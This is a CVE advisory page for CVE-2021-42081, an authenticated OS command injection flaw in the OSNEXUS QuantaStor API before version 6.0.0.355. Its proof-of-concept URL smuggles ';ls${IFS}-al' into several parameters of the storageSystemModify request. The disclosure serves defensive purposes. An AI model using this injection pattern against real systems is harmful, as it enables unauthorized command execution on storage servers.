Skip to the content.

CVE-2021-42081

Authenticated Remote Command Execution vulnerability in OSNEXUS QuantaStor before 6.0.0.355

CVE CVE-2021-42081
Title Authenticated Remote Command Execution vulnerability in OSNEXUS QuantaStor before 6.0.0.355
Credits
Affected products
Product Affected Unaffected Unknown
OSNEXUS QuantaStor >= 0 to < 6.0.0.355 (semver)
everything else
CVSS Base score: 9.1 (CRITICAL)
References
Problem type(s) CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Date published
Last modified 11 Mar 2025 13:39 UTC

Description

An authenticated administrator is allowed to remotely execute arbitrary shell commands via the API.

POC
http://<IP_ADDRESS>/qstorapi/storageSystemModify?storageSystem=&newName=quantastor&newDescription=;ls${IFS}-al&newLocation=4&newEnclosureLayoutId=5&newDnsServerList=;ls${IFS}-al&externalHostName=&newNTPServerList=;ls${IFS}-al

Solution(s)

Upgrade to the latest version of OSNEXUS QuantaStor.


JSON version.